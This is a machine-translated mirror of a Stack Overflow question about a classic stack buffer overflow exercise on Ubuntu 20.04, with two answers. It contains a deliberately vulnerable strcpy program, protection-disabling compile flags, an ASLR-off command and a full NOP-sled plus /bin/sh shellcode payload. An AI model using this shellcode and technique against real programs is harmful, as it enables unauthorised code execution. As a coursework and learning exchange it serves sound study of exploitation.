堆栈内存溢出
  繁体   English   中英

缓冲区溢出攻击在 Ubuntu 20.04 上不起作用

[英]Buffer Overflow Attack doesn't work on Ubuntu 20.04

 原文  2020-05-12 22:17:00       c/ security/ ubuntu/ buffer-overflow/ exploit

问题描述

我正在尝试对一个简单的 C 程序进行缓冲区溢出攻击,该程序需要一个缓冲区并打印它。 我尝试了很多组合,但最后,当我尝试执行我的 shellcode 时,我总是得到分段错误。

我主要遵循本教程:

如何利用缓冲区溢出漏洞 - 实用

不同之处在于我尝试在 m64 中编译程序,因为当我在 m32 中编译时,我的 memory 地址都不同,我试图解释我的步骤,但如果他们不清楚你可以看视频,因为我'已经遵循相同的程序。

我用来尝试攻击的代码是

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char buf[256];
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}

我以这种方式编译代码:

gcc -o example -fno-stack-protector -m64 -z execstack example.c

我也试过用 m32 编译它,但正如我之前所说,但我用 gdb 反汇编后的结果与教程完全不同,另一方面,当我用 m64 编译它时,它们非常相似,所以更容易跟随。

一旦我编译它并打开 gdb 我反汇编程序的主体并寻找 strcpy 调用。 我 select 在 strcpy 调用之后的地址之一,我在该地址中设置了一个断点。

在此之后我运行 python 代码

run $(python -c "print('A'*256)")

然后我在运行这个命令后检查程序的内容,它打印出 256 As。 我用命令检查它

x/200xb $esp

我现在可以在 memory 中看到我的“AAA..”序列开始的确切地址,我将它写在一篇论文中,然后再次运行我的 python 代码以了解它在分段错误 Z9ED39E2EA931586B73A985A6942 中的值。

一旦找到 Seg Fault 条件,我只需运行以下命令:

run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xcf\xff\xff')")

在哪里:

  • 222 只是我需要到达 Segmentation Fault 的 \x90 的数量减去我的 shellcode 的大小(即 46 字节)
  • 最后一个 '\x94\xcf\xff\xff' 是我之前在一篇论文中写的地址,当时我检查了 memory 中的 'AAAA' 序列并查看了它从哪里开始,当然当我用 m64 编译程序时,这个地址是更长

此时,当我运行命令时,shellcode 应该被执行但它没有发生,它总是说 Segmentation Fault。

当然我也用命令禁用了 aslr

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

抱歉,如果我的解释很混乱,我已经尝试了所有不同的可能性,但我从来没有得到正确的结果。 (当然要更改一些标志,m64,m32 并稍微使用最后一个命令的值)。

在此先感谢,我真的希望你能帮助我,因为我需要为大学作业解决这个问题

2 个解决方案

解决方案1
 0  2020-06-05 09:13:58

我认为您的错误在于退货地址:

run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xfc\xff\xbf')")

而不是0xffffcf94 (在 m32)使用0xbffffc94

也许这是错误的,因为你看的视频真的很老了,很多东西都变了,直到今天

要对其进行测试,请在主 function 中的返回指令处设置断点,然后将info registers键入 gdb 以查看esp (堆栈指针)的值是多少

如果不是这种情况,那么您的 shellcode 对于 ubuntu 20.04 可能已经过时,或者您在 x86 可执行文件中使用 x64 shellcode

尝试在你的 shellcode 的开头添加一个\xcc来测试你的 shellcode 是否被破坏并导致SIGSEGV信号

我也尝试自己开发一个 POC,它是:

图片

run $(python -c 'print "\x90"*255 + "\xcc" + "aaaabbbbcccc" + "\x68\xfb\xff\xbf"')

其中\x90 * 255是 255 条nop指令,以确保我们将降落在陷阱\xcc上。 aaaabbbbcccc是我用来访问 eip 的一些垃圾, 0xbffffb68是堆栈的返回地址。

解决方案2
 -1  2021-08-08 03:04:45

您需要在跳转地址之前添加“ret”小工具

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 简单的缓冲区溢出漏洞利用不起作用 缓冲区溢出攻击,不执行shellcode dlsym() + RTLD_NEXT 在 Ubuntu 20.04 上无法正常工作 不溢出的缓冲区溢出 C缓冲区溢出攻击 缓冲区溢出攻击 缓冲区溢出攻击格式 使用 shellcode 的简单缓冲区溢出漏洞利用不起作用 反汇编 - 缓冲区溢出攻击(作业) 返回 libc 缓冲区溢出攻击
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM